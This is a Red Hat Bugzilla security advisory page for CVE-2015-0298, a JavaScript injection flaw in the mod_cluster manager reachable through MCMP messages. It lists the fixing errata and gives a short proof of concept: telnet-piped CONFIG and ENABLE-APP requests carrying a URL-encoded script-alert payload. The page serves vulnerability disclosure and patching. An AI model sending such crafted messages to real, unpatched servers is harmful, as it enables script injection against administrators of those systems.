Bug 1197769 (CVE-2015-0298)
| Summary: | CVE-2015-0298 mod_cluster: JavaScript code injection is possible via MCMP mod_manager messages | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Vasyl Kaigorodov <vkaigoro> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | Michal Karm Babacek <mbabacek> |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | unspecified | CC: | aileenc, alazarot, asantos, aszczucz, bbaranow, bdawidow, bmaxwell, bperkins, brms-jira, cdewolf, chazlett, dandread, darran.lofthouse, epp-bugs, etirelli, fnasser, gvarsami, huwang, jawilson, jboss-set, jbpapp-maint, jclere, jcoleman, jdg-bugs, jdoyle, jolee, jpallich, kconner, ldimaggi, lgao, lpetrovi, mbabacek, mbaluch, mgoldman, mweiler, mwinkler, myarboro, nwallace, pgier, psakar, pslavice, rhq-maint, rrajasek, rsvoboda, rwagner, rzhang, security-response-team, soa-p-jira, spinder, tcunning, theute, tkirby, ttarrant, twalsh, vhalbert, vtunka, weli |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: |
A flaw was found in the way the mod_cluster manager processed certain MCMP messages. An attacker with access to the network from which MCMP messages are allowed to be sent could use this flaw to execute arbitrary JavaScript code in the mod_cluster manager web interface.
|
Story Points: | --- |
| Clone Of: | Environment: | ||
| Last Closed: | 2019-06-08 02:39:19 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | 1197186, 1238180, 1245614, 1260483, 1260484 | ||
| Bug Blocks: | 1197776, 1254231 | ||
Ad Comment 0: [1] https://issues.jboss.org/secure/attachment/12388047/12388047_MODCLUSTER-453_master-better_one.patch removing embargo due to patch has been included in EAP 6.4. This issue has been addressed in the following products: JBoss Web Server 2.1.0 Via RHSA-2015:1641 https://rhn.redhat.com/errata/RHSA-2015-1641.html This issue has been addressed in the following products: JBEWS 2 for RHEL 6 JBEWS 2 for RHEL 7 JBEWS 2 for RHEL 5 Via RHSA-2015:1642 https://rhn.redhat.com/errata/RHSA-2015-1642.html |
Michal Babacek from Red Hat discovered [1] that it's possible to iject arbitrary JavaScript code in the mod_manager web interface using MCMP messages: - With mod_cluster Manager running on 127.0.0.1:6666 run the commands below: """ { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666 { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666 """ - Open http://localhost:6666/mod_cluster_manager and you'll see a JavaScript pop-up Alert being executed. Proposed (intrusive) patch and further discussion is available at [1]. [1]: https://issues.jboss.org/browse/MODCLUSTER-453